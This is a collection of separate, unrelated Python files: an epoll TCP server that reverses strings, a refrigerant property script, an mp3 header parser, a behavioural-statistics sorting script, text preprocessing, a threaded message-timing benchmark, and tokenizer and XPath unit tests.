timeout_seconds = 5)
# * When the recalc is done, he sees the spinner go away
self.wait_for_cell_value(1, 1, 'ready', timeout_seconds=25)
self.assertTrue(self.is_element_present('css=#id_spinner_image.hidden'))
|
import select
import socket
from nbNetUtils import DEBUG, dbgPrint
__all__ = ["nbNet"]
class STATE:
def __init__(self):
self.state = "accept" # 定义状态
self.have_read = 0 # 记录读了的字节
self.need_read = 10 # 头文件需要读取10个字节
self.have_write = 0 # 记录读了的字节
self.need_write = 0 # 需要写的字节
self.buff_read = "" # 读缓存
self.buff_write = "" # 写缓存
self.sock_obj = "" # sock对象
def printState(self):
if DEBUG:
dbgPrint('\n - current state of fd: %d' % self.sock_obj.fileno())
dbgPrint(" - - state: %s" % self.state)
dbgPrint(" - - have_read: %s" % self.have_read)
dbgPrint(" - - need_read: %s" % self.need_read)
dbgPrint(" - - have_write: %s" % self.have_write)
dbgPrint(" - - need_write: %s" % self.need_write)
dbgPrint(" - - buff_read: %s" % self.buff_read)
dbgPrint(" - - buff_write: %s" % self.buff_write)
dbgPrint(" - - sock_obj: %s" % self.sock_obj)
class nbNetBase:
def setFd(self, sock):
dbgPrint("\n setFd start")
tmp_state = STATE() # 实例化类
tmp_state.sock_obj = sock # 定义类中sock
self.conn_state[sock.fileno()] = tmp_state # 把sock加入到字典中
self.conn_state[sock.fileno()].printState()
dbgPrint("\n setFd end")
def accept(self, fd):
dbgPrint("\n accept start!")
sock_state = self.conn_state[fd] # 取出fd对应连接
sock = sock_state.sock_obj # 取出fd的sock
conn, addr = sock.accept() # 取出连接请求
conn.setblocking(0) # 设置非阻塞模式
return conn # 返回连接
def close(self, fd):
try:
sock = self.conn_state[fd].sock_obj # 取出fd的sock
sock.close() # 关闭sock
except:
dbgPrint("Close fd: %s" % fd)
finally:
self.epoll_sock.unregister(fd) # 将fd重epoll中注销
self.conn_state.pop(fd) # 踢出字典
def read(self, fd):
try:
sock_state = self.conn_state[fd] # 取出fd对应连接
conn = sock_state.sock_obj # 取出fd连接请求
if sock_state.need_read <= 0: # 需要读取字节为空报错
raise socket.error
one_read = conn.recv(sock_state.need_read) # 读取传输的字符
dbgPrint("\n func fd: %d, one_read: %s, need_read: %d" %
(fd, one_read, sock_state.need_read))
if len(one_read) == 0: # 读取数据为0报错
raise socket.error
sock_state.buff_read += one_read # 把读取数据存到读缓存中
sock_state.have_read += len(one_read) # 已经读取完的数据量
sock_state.need_read -= len(one_read) # 还需要读取数据的量
sock_state.printState()
if sock_state.have_read == 10: # 10字节为头文件处理
header_said_need_read = int(sock_state.have_read) # 读取数据的量
if header_said_need_read <= 0: # 如果还需读0字节报错
raise socket.error
sock_state.need_read += header_said_need_read # 还需读取数量变化
sock_state.buff_read = '' # 读缓存清空
sock_state.printState()
return "readcontent" # 还需读取数据
elif sock_state.need_read == 0:
return "process" # 读取数据完成,转换状态
else:
return "readmore" # 还需读取数据
except (socket.error, ValueError), msg:
try:
if msg.errno == 11: # errno等于11,尝试进行一次读取
dbgPrint("11" + msg)
return "retry"
except:
pass
return "closing"
def write(self, fd):
sock_state = self.conn_state[fd] # 取出fd对应的连接构造体
conn = sock_state.sock_obj # 取出fd对于连接
last_have_send = sock_state.have_write # 已经写数据的量
try:
have_send = conn.send(
sock_state.buff_write[last_have_send:]) # 发送剩下的数据
sock_state.have_write += have_send # 已经写的数据量
sock_state.need_write -= have_send # 还需写的数据量
if sock_state.need_write == 0 and sock_state.have_write != 0: # 写数据完成
sock_state.printState()
dbgPrint("\n write date end")
return "writecomplete" # 返回写入完成
else:
return "writemore" # 返回计算写入
except socket.error, msg:
return "closing"
def run(self):
while True:
epoll_list = self.epoll_sock.poll() # 定义poll()事件发生的list
for fd, events in epoll_list:
sock_state = self.conn_state[fd] # 取出fd构造体
if select.EPOLLHUP & events: # 文件描述符挂断
dbgPrint("EPOLLHUP")
sock_state.state = "closing" # fd状态设置为closing
elif select.EPOLLERR & events:
dbgPrint("EPOLLERR") # 文件描述符出错
sock_state.state = "closing" # 对应fd状态为closing
self.state_machine(fd) # 状态机调用
def state_machine(self, fd):
sock_state = self.conn_state[fd] # fd构造体
self.sm[sock_state.state](fd) # 通过sm字典调用对应状态的函数
class nbNet(nbNetBase):
def __init__(self, addr, port, logic):
dbgPrint('\n__init__: start!')
self.conn_state = {} # 定义字典保存每个连接状态
self.listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listen_sock.bind((addr, port))
self.listen_sock.listen(10) # 排队长度
self.setFd(self.listen_sock) # 定义listen socket 放入字典conn_state
self.epoll_sock = select.epoll() # 初始化fd的epoll
self.epoll_sock.register(
self.listen_sock.fileno(), select.EPOLLIN) # linten可以读的描述符
self.logic = logic # 业务处理
self.sm = {
"accept": self.accept2read,
"read": self.read2process,
"write": self.write2read,
"process": self.process,
"closing": self.close,
} # 状态调用机的字典
dbgPrint('\n__init__: end, register no: %s' %
self.listen_sock.fileno())
def process(self, fd):
sock_state = self.conn_state[fd]
response = self.logic(sock_state.buff_read) # 业务函数处理
sock_state.buff_write = "%010d%s" % (len(response), response) # 发送的数据
sock_state.need_write = len(sock_state.buff_write) # 需要发送的长度
sock_state.state = "write" # fd对应的状态
self.epoll_sock.modify(fd, select.EPOLLOUT) # fd对应的epoll为改写模式
sock_state.printState()
def accept2read(self, fd):
conn = self.accept(fd)
self.epoll_sock.register(
conn.fileno(), select.EPOLLIN) # 发送数据后重新将fd的epoll改成读
self.setFd(conn) # fd生成构造体
self.conn_state[conn.fileno()].state = "read" # fd状态为read
dbgPrint("\n -- accept end!")
def read2process(self, fd):
read_ret = ""
# 状态转换
try:
read_ret = self.read(fd) # read函数返回值
except (Exception), msg:
dbgPrint(msg)
read_ret = "closing"
if read_ret == "process": # 读取完成,转换到process
self.process(fd)
elif read_ret == "readcontent": # readcontent、readmore、retry 继续读取
pass
elif read_ret == "readmore":
pass
elif read_ret == "retry":
pass
elif read_ret == "closing":
self.conn_state[fd].state = 'closing' # 状态为closing关闭连接
self.state_machine(fd)
else:
raise Exception("impossible state returned by self.read")
def write2read(self, fd):
try:
write_ret = self.write(fd) # 函数write返回值
except socket.error, msg: # 出错关闭连接
write_ret = "closing"
if write_ret == "writemore": # 继续写
pass
elif write_ret == "writecomplete": # 写完成
sock_state = self.conn_state[fd]
conn = sock_state.sock_obj
self.setFd(conn) # 重置见连接fd构造体
self.conn_state[fd].state = "read" # 将fd状态设置为read
self.epoll_sock.modify(fd, select.EPOLLIN) # epoll状态为可读
elif write_ret == "closing": # 发生错误关闭
dbgPrint(msg)
self.conn_state[fd].state = 'closing'
self.state_machine(fd)
if __name__ == '__main__':
def logic(d_in):
return(d_in[::-1])
reverseD = nbNet('0.0.0.0', 9060, logic)
reverseD.run()
|
'''
Created on 20 Sep 2013
@author: jowr
'''
from pyrp.refpropClasses import RefpropSI
import CoolProp.CoolProp as cp
p = 30000
T = 273.15
ref = False
if ref:
xkg = [0.473194694453358, 0.205109095413331, 0.321696210133311]
names = "R32|R125|R134a"
RP = RefpropSI()
RP.SETUPFLEX(xkg=xkg, FluidNames=names)
T_A, p_A, D_A, Dl_A, Dv_A, q_A, e_A, h_A, s_A, cv_A, cp_A, w_A = RP.PQFLSH(p, 0)
T_B, p_B, D_B, Dl_B, Dv_B, q_B, e_B, h_B, s_B, cv_B, cp_B, w_B = RP.PQFLSH(p, 1)
T_C, p_C, D_C, Dl_C, Dv_C, q_C, e_C, h_C, s_C, cv_C, cp_C, w_C = RP.TQFLSH(T, 0)
hlb = h_A / 1000.
hrb = h_B / 1000.
h200 = h_C / 1000.
print("Refprop: %s %s %s" % (hlb, hrb, h200))
else:
R407F = 'REFPROP-MIX:R32[0.473194694453358]&R125[0.205109095413331]&R134a[0.321696210133311]'
# R407F='REFPROP-MIX:R32[0.651669604033581]&R125[0.122438378639971]&R134a[0.225892017326446]'
hlb = cp.Props('H', 'P', 30, 'Q', 0, R407F) # 30 kPa saturated liquid
hrb = cp.Props('H', 'P', 30, 'Q', 1, R407F) # 30 kPa saturated vapour
h200 = cp.Props('H', 'T', 273.15, 'Q', 0, R407F) # saturated liquid at 0C IIR
print("CoolProp: %s %s %s" % (hlb, hrb, h200))
|
""" mp3.py
Reads information from an mp3 file.
This is a python port of code taken from the mpg123 input module of xmms.
"""
import struct
def header(buf):
return struct.unpack(">I",buf)[0]
def head_check(head):
if ((head & 0xffe00000L) != 0xffe00000L):
return 0
if (not ((head >> 17) & 3)):
return 0
if (((head >> 12) & 0xf) == 0xf):
return 0
if ( not ((head >> 12) & 0xf)):
return 0
if (((head >> 10) & 0x3) == 0x3):
return 0
if (((head >> 19) & 1) == 1 and ((head >> 17) & 3) == 3 and ((head >> 16) & 1) == 1):
return 0
if ((head & 0xffff0000L) == 0xfffe0000L):
return 0
return 1
def filesize(file):
""" Returns the size of file sans any ID3 tag
"""
f=open(file)
f.seek(0,2)
size=f.tell()
try:
f.seek(-128,2)
except:
f.close()
return 0
buf=f.read(3)
f.close()
if buf=="TAG":
size=size-128
if size<0:
return 0
else:
return size
table=[[
[0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448],
[0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384],
[0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]],
[
[0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256],
[0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160],
[0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160]]]
def decode_header(head):
""" Decode the mp3 header and put the information in a frame structure
"""
freqs=[44100, 48000, 32000, 22050, 24000, 16000, 11025, 12000, 8000]
fr={}
if head & (1 << 20):
if head & (1 << 19):
fr["lsf"]=0
else:
fr["lsf"]=1
fr["mpeg25"] = 0
else:
fr["lsf"] = 1
fr["mpeg25"] = 1
fr["lay"] = 4 - ((head >> 17) & 3)
if fr["mpeg25"]:
fr["sampling_frequency"] = freqs[6 + ((head >> 10) & 0x3)]
else:
fr["sampling_frequency"] = freqs[((head >> 10) & 0x3) + (fr["lsf"] * 3)]
fr["error_protection"] = ((head >> 16) & 0x1) ^ 0x1
fr["bitrate_index"] = ((head >> 12) & 0xf)
fr["bitrate"]=table[fr["lsf"]][fr["lay"]-1][fr["bitrate_index"]]
fr["padding"]=((head>>9) & 0x1)
fr["channel_mode"]=((head>>6) & 0x3)
if fr["lay"]==1:
fr["framesize"]=table[fr["lsf"]][0][fr["bitrate_index"]]*12000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]
fr["framesize"]=((fr["framesize"]+fr["padding"])<<2)-4
elif fr["lay"]==2:
fr["framesize"]=table[fr["lsf"]][1][fr["bitrate_index"]]*144000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]
fr["framesize"]=fr["framesize"]+fr["padding"]-1
elif fr["lay"]==3:
fr["framesize"]=table[fr["lsf"]][2][fr["bitrate_index"]]*144000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]<<fr["lsf"]
fr["framesize"]=fr["framesize"]+fr["padding"]-4
pass
else:
return 0
return fr
def decode_vbr(buf):
vbr = {}
if buf[:4] != "Xing":
return 0
frames_flag = ord(buf[7]) & 1
if not frames_flag:
return 0
vbr["frames"] = header(buf[8:])
return vbr
def decode_synch_integer(buf):
return (ord(buf[0])<<21)+(ord(buf[1])<<14)+(ord(buf[2])<<7)+ord(buf[3])
def detect_mp3(filename):
""" Determines whether this is an mp3 file and if so reads information
from it.
"""
try:
f=open(filename,"rb")
except:
return 0
try:
tmp=f.read(4)
except:
f.close()
return 0
if tmp[:3] == 'ID3':
try:
tmp = f.read(6)
f.seek(decode_synch_integer(tmp[2:])+10)
tmp=f.read(4)
except:
f.close()
return 0
try:
head=header(tmp)
except:
return 0
while not head_check(head):
# This is a real time waster, but an mp3 stream can start anywhere
# in a file so we have to search the entire file which can take a
# while for large non-mp3 files.
try:
buf=f.read(1024)
except:
f.close()
return 0
if buf=="":
f.close()
return 0
for i in range(0,len(buf)-1):
head=long(head)<<8;
head=head|ord(buf[i])
if head_check(head):
f.seek(i+1-len(buf),1)
break
mhead=decode_header(head)
if mhead:
# Decode VBR header if there's any.
pos = f.tell()
mhead["vbr"] = 0
if not mhead["lsf"]:
if mhead["channel_mode"] == 3:
vbrpos = 17
else:
vbrpos = 32
else:
if mhead["channel_mode"] == 3:
vbrpos = 9
else:
vbrpos = 17
try:
f.seek(vbrpos,1)
vbr = decode_vbr(f.read(12))
mhead["vbrframes"] = vbr["frames"]
if mhead["vbrframes"] >0:
mhead["vbr"] = 1
except:
pass
# We found something which looks like a MPEG-header
# We check the next frame too, to be sure
if f.seek(pos+mhead["framesize"]):
f.close()
return 0
try:
tmp=f.read(4)
except:
f.close()
return 0
if len(tmp)!=4:
f.close()
return 0
htmp=header(tmp)
if not (head_check(htmp) and decode_header(htmp)):
f.close()
return 0
f.close()
# If we have found a valid mp3 add some more info the head data.
if mhead:
mhead["filesize"]=filesize(filename)
if not mhead["vbr"]:
if mhead["bitrate"] and mhead["filesize"]:
mhead["time"]=int(float(mhead["filesize"])/(mhead["bitrate"]*1000)*8)
else:
mhead["time"]=0
else:
if mhead["filesize"] and mhead["sampling_frequency"]:
medframesize = float(mhead["filesize"])/float(mhead["vbrframes"])
if mhead["lsf"]:
coef = 12
else:
coef = 144
vbrrate = medframesize*mhead["sampling_frequency"]/(1000*coef)
mhead["time"]=int(float(mhead["filesize"])/(vbrrate*1000)*8)
mhead["vbrrate"] = int(vbrrate)
return mhead
else:
return 0
if __name__=="__main__":
import sys
mp3info=detect_mp3(sys.argv[1])
if mp3info:
print mp3info
else:
print "Not an mp3 file."
|
def listDeal(list):
listString = ''
for i in range(0,len(list)):
print(i)
if i!=(len(list)-1):
listString += list[i]+',';
else:
listString += 'and '+list[i]
print(listString)
spam = ['apples','bananas','tofu','cats']
listDeal(spam)
|
import os,sys,glob,re
import numpy as np
import scipy
from scipy import stats
import datetime
import time
from datetime import timedelta
from scipy.stats.kde import gaussian_kde
from numpy import linspace
from scipy.stats import kruskal
import pandas as pd
import statsmodels.api as sm
from scipy.stats import mstats
nonstimcombos = {"Frequency of movement": ["numberofbouts_min", "numberofbouts_10min", "dpixnumberofbouts_min", "dpixnumberofbouts_10min", "aveinterboutinterval_min", "aveinterboutinterval_10min", "avedpixinterboutinterval_min", "avedpixinterboutinterval_10min", "dpixsecper_min", "dpixminper_10min", "distsecper_min", "distminper_10min"], "Location in well": ["interboutcenterfrac_min", "interboutaverhofrac_min", "centerfrac_min", "averhofrac_min","interboutcenterfrac_10min", "interboutaverhofrac_10min", "centerfrac_10min", "averhofrac_10min"], "Features of movement": ["dpixavebouttime_min", "dpixavebouttime_10min", "aveboutvel_min", "aveboutvel_10min", "avebouttime_min", "avebouttime_10min", "aveboutspeed_min", "aveboutspeed_10min", "aveboutdist_min", "aveboutdist_10min", "aveboutdisp_min", "aveboutdisp_10min", "aveboutcumdpix_min", "aveboutcumdpix_10min"]}
typecombos = [["Night tap habituation", "Day tap habituation 1", "Day tap habituation 2", "Day tap habituation 3"], ["Day light flash", "Night light flash"],["Night early prepulse tap", "Day early prepulse tap"], ["Night all prepulse tap", "Day all prepulse tap"], ["Day all strong tap", "Night all strong tap"], ["Day early strong tap","Night early strong tap"],["Night early weak tap", "Day early weak tap"], ["Day all weak tap", "Night all weak tap"], ["Dark flash block 3 start","Dark flash block 3 end","Dark flash block 4 start","Dark flash block 4 end","Dark flash block 1 start","Dark flash block 1 end","Dark flash block 2 start","Dark flash block 2 end"]]
stimcombos = {
#"Day light flash and weak tap": ["106106"],
#"Night light flash and weak tap": ["night106106"],
"Night tap habituation": ["nighttaphab102", "nighttaphab1"],
"Day tap habituation 1": ["adaytaphab102", "adaytaphab1"],
"Day tap habituation 3": ["cdaytaphab102", "cdaytaphab1"],
"Day tap habituation 2": ["bdaytaphab102", "bdaytaphab1"],
"Day light flash": ["lightflash104"],
#"Day light flash": ["lightflash104", "lightflash0"],
"Night light flash": ["nightlightflash104"],
#"Night light flash": ["nightlightflash104", "nightlightflash0"],
"Night early prepulse tap": ["shortnightprepulseinhibition100b"],
#"Night early prepulse tap": ["shortnightprepulseinhibition100b", "shortnightprepulseinhibition100c"],
"Night all prepulse tap": ["nightprepulseinhibition100b"],
#"Night all prepulse tap": ["nightprepulseinhibition100b", "nightprepulseinhibition100c"],
"Day early prepulse tap": ["shortdayprepulseinhibition100b"],
#"Day early prepulse tap": ["shortdayprepulseinhibition100b", "shortdayprepulseinhibition100c"],
"Day all prepulse tap": ["dayprepulseinhibition100b"],
#"Day all prepulse tap": ["dayprepulseinhibition100b", "dayprepulseinhibition100c"],
"Day all weak tap": ["dayprepulseinhibition100a", "dayprepulseinhibition101"],
"Day early weak tap": ["shortdayprepulseinhibition100a", "shortdayprepulseinhibition101"],
"Night all weak tap": ["nightprepulseinhibition100a", "nightprepulseinhibition101"],
"Night early weak tap": ["shortnightprepulseinhibition100a", "shortnightprepulseinhibition101"],
"Day early strong tap": ["adaytappre102", "shortdayprepulseinhibition102"],
#"Day early strong tap": ["adaytappre102", "adaytappre1", "shortdayprepulseinhibition102"],
"Day all strong tap": ["dayprepulseinhibition102", "adaytappostbdaytappre102","bdaytappostcdaytappre102", "cdaytappost102"],
#"Day all strong tap": ["dayprepulseinhibition102", "adaytappostbdaytappre102","bdaytappostcdaytappre102", "bdaytappostcdaytappre1", "cdaytappost1", "cdaytappost102","adaytappostbdaytappre1"],
"Night early strong tap": ["nighttappre102"],
#"Night early strong tap": ["nighttappre1", "nighttappre102"],
"Night all strong tap": ["nightprepulseinhibition102","nighttappost102"],
#"Night all strong tap": ["nightprepulseinhibition102","nighttappost102", "nighttappost1"],
#"Dark flash all blocks": ["darkflash103", "darkflash0"],
"Dark flash block 3 start": ["cdarkflash103"],
"Dark flash block 3 end": ["c2darkflash103"],
"Dark flash block 1 start": ["adarkflash103"],
"Dark flash block 1 end": ["a2darkflash103"],
"Dark flash block 2 start": ["bdarkflash103"],
"Dark flash block 2 end": ["b2darkflash103"],
"Dark flash block 4 start": ["ddarkflash103"],
"Dark flash block 4 end": ["d2darkflash103"]}
direction_swaps = ["rhofrac", "latency", "interboutinterval", "fullboutdatamaxloc"]
for file in glob.glob("*linearmodel*"): # THIS IS WHAT THE PRINT OUTPUT MUST POINT TO, CAN HAVE SOMETHING AT END, BUT MUST START THIS WAY
if "finalsorted" in file:
continue
dir = os.path.basename(os.path.dirname(os.path.realpath(__file__)))
ffile = open('finalsortedupdatedCP4or2_' + file + "_" + dir, 'w')
ofile = open(file, 'r')
lines = ofile.readlines()
pdict = {}
for line in lines:
# anova data
if line.startswith("anova:"):
pval = line.split(":")[3].strip().split()[3].strip()
#anova: ribgraph_mean_ribbon_latencyresponse_dpix_nighttappost102.png : Mean of array wt, mut, H-stat, P-value: 25.8557471264 21.4177419355 2.63243902441 0.104700765405
meanwtminmut = float(line.split(":")[3].strip().split()[0]) - float(line.split(":")[3].strip().split()[1])
name = line.split(":")[1].strip()
pdict[name] = [pval, meanwtminmut]
# linear mixed model data - this formatting could change if I change the linear model I'm using
else:
list = []
for line in range(0, len(lines)):
#print lines[line]
if lines[line].startswith("mutornot[T.wt] "):
#print lines[line]
if len(lines[line].split()) > 3:
pvalue = lines[line].split()[4]
coef = lines[line].split()[1]
if float(pvalue) == 0:
pvalue = 0.001
list.append((float(pvalue), float(coef), lines[line-13].strip()))
#list.append((float(pvalue), lines[line-13].strip(), lines[line].split()[1:6]))
# list2 = sorted(list, key=lambda x: x[0])
for fline in list:
#pdict[str(fline[2])] = (str(fline[0])[:8], str(fline[1])[:8])
pdict[str(fline[2])] = [str(fline[0])[:8], str(fline[1])[:8]]
#ffile.write(str(fline[0])[:8])
#ffile.write(', ')
#ffile.write(str(fline[1])[:8])
#ffile.write(', ')
#ffile.write(str(fline[2]))
#ffile.write('\n')
splitdict = {}
for k in pdict:
# k = ribgraph_mean_ribbonbout_dpixavebouttime_min_day1taps.png
# section = day1taps
# or section = adaytappostbdaytappre102
if k.startswith("ratio"):
continue
section = k.split('.')[0].split('_')[-1]
for k2 in nonstimcombos.keys():
# k2 = "Frequency of movement"
for v2 in nonstimcombos[k2]:
# v2 = numberofbouts_min
if v2 in k:
test = False
for k3 in splitdict.keys():
if (k2 + " " + section) == k3:
test = True
if test == False:
splitdict[k2 + " " + section] = []
splitdict[k2 + " " + section].append([k,pdict[k]])
else:
splitdict[k2 + " " + section].append([k,pdict[k]])
break
for sk2 in stimcombos.keys():
# sk2 = "Night light flash"
for sv2 in stimcombos[sk2]:
# sv2 = nightlightflash104
if sv2 == k.split('.')[0].split('_')[-1]:
# combining everything for these stimuli responses
test = False
for sk3 in splitdict.keys():
if sk2 == sk3:
test = True
if test == False:
splitdict[sk2] = []
splitdict[sk2].append([k,pdict[k]])
else:
splitdict[sk2].append([k,pdict[k]])
break
for skey in splitdict.keys():
lowest = 10
listints = []
cutpoint = 0.05
cutpointnumber = 3
if skey in stimcombos.keys():
cutpointnumber = 4
else:
cutpointnumber = 3
cutlist = []
for t in typecombos:
for tt in t:
if skey == tt:
#cutpointnumber = 4
#print "TEST", skey, t
import copy
shortt = copy.copy(t)
shortt.remove(tt)
#print shortt
for svey0 in splitdict[skey]:
if abs(float(svey0[1][0])) < cutpoint:
if "bigmovesribgraph_mean_ribbon_freqresponse_dpix_" in svey0[0] and "100b.png" in svey0[0]:
cutpointnumber = 0
#print "testing1 ", skey, svey0
for ttt in shortt:
for tsvey in splitdict[ttt]:
#print "testing3", ttt, tsvey
if '_'.join(svey0[0].split('.')[0].split('_')[:-1]) == '_'.join(tsvey[0].split('.')[0].split('_')[:-1]):
#print "testing4", ttt, tsvey, '_'.join(svey0[0].split('.')[0].split('_')[:-1]), '_'.join(tsvey[0].split('.')[0].split('_')[:-1])
if abs(float(tsvey[1][0])) < cutpoint:
#print "testing5", tsvey
cutpointnumber = 2
break
for svey in splitdict[skey]:
switch = False
for x in direction_swaps:
if x in svey[0]:
switch = True
if switch == False:
if float(svey[1][1]) > 0:
# change the sign of the original data
# if wt is moving more than mutant (>0), want signs swapped so mutant is over wt (ie, mutant moving less than wt has - number)
svey[1][0] = float(svey[1][0]) * -1
# else, data is fine as is
else: # switch == True
# in the cases where a switch is needed for the sign (such as interboutinterval because it's opposite when considering frequency)
if float(svey[1][1]) < 0: # if wt has greater interboutinterval and then the number is positive (ie, mutant moves more), don't swap, do swap if <
# change the sign of the original data
svey[1][0] = float(svey[1][0]) * -1
#lowest = 10
#listints = []
#cutpoint = 0.05
#cutpointnumber = 3
#cutlist = []
for svey in splitdict[skey]:
#print skey, svey
listints.append(float(svey[1][0]))
if abs(float(svey[1][0])) < abs(lowest):
lowest = float(svey[1][0])
if abs(float(svey[1][0])) < cutpoint:
cutlist.append(float(svey[1][0]))
ave = np.mean(np.absolute(np.asarray(listints)))
if lowest < 0:
ave = ave * -1
if len(cutlist) > cutpointnumber:
cutave = np.mean(np.absolute(np.asarray(cutlist)))
if lowest < 0:
cutave = cutave * -1
else:
cutave = ave
ffile.write("Lowest ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(lowest))
ffile.write('\n')
ffile.write("Average ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(ave))
ffile.write('\n')
ffile.write("Lowaverage (reg if not >")#3, <0.05) ")
ffile.write(str(cutpointnumber))
ffile.write(", <0.05) ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(cutave))
ffile.write('\n')
for svey in splitdict[skey]:
ffile.write(str(svey[0]))
ffile.write(', ')
ffile.write(str(svey[1][0]))
ffile.write(', ')
ffile.write(str(svey[1][1]))
ffile.write('\n')
#print splitdict
#ffile.write(k)
#ffile.write(', ')
#ffile.write(str(pdict[k][0]))
#ffile.write(', ')
#ffile.write(str(pdict[k][1]))
#ffile.write('\n')
|
import numpy as np
import sys
import os
from utils import *
from utils_procs import *
_, input_fname = sys.argv
input_path = '../story/'
train_test_ratio = .9
def get_word_level_rep(text, output_path, train_test_ratio):
# convert to word-level representation
indices, _, words_dict = text_2_one_hot(text)
index_string = list_of_int_to_int_string(indices)
# save .npz word file and its dictionary
save_list_of_int_to_npz(indices, words_dict, output_path, train_test_ratio)
save_dict(words_dict, output_path)
# write to output file - char level
write2file(text, 'chars_we.txt', output_path)
[text] = remove_end_markers([text])
write2file(text, 'chars_woe.txt', output_path)
input_path = os.path.join(input_path,input_fname)
print('Input text from <%s>' % os.path.abspath(input_path))
input_file_path = os.path.join(input_path, input_fname + '.txt')
input_file = open(input_file_path, 'r')
text = input_file.read()
output_path = input_path
make_output_cond_dirs(output_path)
text = str2cleanstr(text)
text_shufw = shuffle_words_in_state(text)
text_shufs = shuffle_states_in_story(text)
[text, text_shufw, text_shufs] = to_lower_case([text, text_shufw, text_shufs])
get_word_level_rep(text, os.path.join(output_path, 'shuffle_none'), train_test_ratio)
get_word_level_rep(text_shufw, os.path.join(output_path, 'shuffle_words'), train_test_ratio)
get_word_level_rep(text_shufs, os.path.join(output_path, 'shuffle_states'), train_test_ratio)
|
import sys
import datetime
from threading import Thread
class ProcPing(Thread):
def __init__(self, name, data, qtdMsg):
Thread.__init__(self)
self.name = name
self.data = data
self.qtdMsg = qtdMsg
self.mailBox = []
def setPeer(self, Peer):
self.Peer = Peer
def send(self, dado):
self.Peer.mailBox = dado
def recv(self):
while True:
if not len(self.mailBox) < len(self.data):
print(self)
self.mailBox = []
break
def run(self):
for i in range (0, self.qtdMsg + 1):
self.send(self.data)
if i < self.qtdMsg:
self.recv()
class PingPing(Thread):
def __init__(self, tamMsg, qtdMsg):
Thread.__init__(self)
self.tamMsg = tamMsg
self.qtdMsg = qtdMsg
def run(self):
index = 0
array = [1]
while index < self.tamMsg -1:
array.append(1)
index = index + 1
p1 = ProcPing("1", array, self.qtdMsg)
p2 = ProcPing("2", array, self.qtdMsg)
p2.setPeer(p1)
p1.setPeer(p2)
timeStart = datetime.datetime.now()
p1.start()
p2.start()
p1.join()
p2.join()
timeEnd = datetime.datetime.now()
timeExec = timeEnd - timeStart
line = "%d\t%d\t%s\n" % (self.tamMsg, self.qtdMsg, timeExec)
try:
arq = open('saida.txt', 'r')
textoSaida = arq.read()
arq.close()
except:
arq = open('saida.txt', 'w')
textoSaida = ""
arq.close()
arq = open('saida.txt', 'w')
textoSaida = textoSaida + line
arq.write(textoSaida)
arq.close()
def main():
param = sys.argv[1:]
tamMsg = int(param[0])
qtdMsg = int(param[1])
pingPing = PingPing(tamMsg, qtdMsg)
pingPing.start()
if __name__=="__main__":
main()
|
import unittest
from broca.tokenize import keyword, util, LemmaTokenizer
class KeywordTokenizeTests(unittest.TestCase):
def setUp(self):
self.docs = [
'This cat dog is running happy.',
'This cat dog runs sad.'
]
def test_overkill(self):
expected_t_docs = [
['cat dog', 'run', 'happy'],
['cat dog', 'run', 'sad']
]
t_docs = keyword.OverkillTokenizer(lemmatize=True,
min_count=1,
threshold=0.1).tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_rake(self):
expected_t_docs = [
['cat dog', 'running happy'],
['cat dog runs sad']
]
t_docs = keyword.RAKETokenizer().tokenize(self.docs)
# Order not necessarily preserved
for i, output in enumerate(t_docs):
self.assertEqual(set(output), set(expected_t_docs[i]))
def test_apriori(self):
expected_t_docs = [
['cat dog'],
['cat dog']
]
t_docs = keyword.AprioriTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_pos(self):
expected_t_docs = [
['cat dog'],
['cat dog']
]
t_docs = keyword.POSTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_overkill_parallel(self):
expected_t_docs = [
['cat dog', 'run', 'happy'],
['cat dog', 'run', 'sad']
]
t_docs = keyword.OverkillTokenizer(lemmatize=True,
min_count=1,
threshold=0.1,
n_jobs=2).tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_rake_parallel(self):
expected_t_docs = [
['cat dog', 'running happy'],
['cat dog runs sad']
]
t_docs = keyword.RAKETokenizer(n_jobs=-1).tokenize(self.docs)
# Order not necessarily preserved
for i, output in enumerate(t_docs):
self.assertEqual(set(output), set(expected_t_docs[i]))
class TokenizeTests(unittest.TestCase):
def setUp(self):
self.docs = [
'This cat dog is running happy.',
'This cat dog runs sad.'
]
def test_lemma(self):
expected_t_docs = [
['cat', 'dog', 'run', 'happy', '.'],
['cat', 'dog', 'run', 'sad', '.']
]
t_docs = LemmaTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_prune(self):
t_docs = [
['cat', 'cat dog', 'happy', 'dog', 'dog'],
['cat', 'cat dog', 'sad']
]
expected_t_docs = [
['cat dog', 'happy', 'dog', 'dog'],
['cat dog', 'sad']
]
t_docs = util.prune(t_docs)
self.assertEqual(t_docs, expected_t_docs)
|
from lxml import etree
from okcupyd import xpath
def test_selected_attribute():
node = xpath.XPathNode(element='element', selected_attribute='value')
assert node.xpath == '//element/@value'
tree = etree.XML("<top><container><element value='1'>"
"</element><element value='2'></element>"
"</container></top>")
builder = xpath.xpb.container.element.select_attribute_('value')
assert builder.xpath == './/container//element/@value'
assert builder.apply_(tree) == ['1', '2']
assert xpath.xpb.element.select_attribute_('value', elem=tree) == \
['1', '2']
def test_text_for_many():
tree = etree.XML("<top><container>"
"<element value='1'>one</element>"
"<element value='2'>two</element>"
"</container></top>")
result = xpath.xpb.container.element.text_.apply_(tree)
assert set(result) == set(['one', 'two'])
def test_attribute_contains():
tree = etree.XML("<top><elem a='complete'></elem></top>")
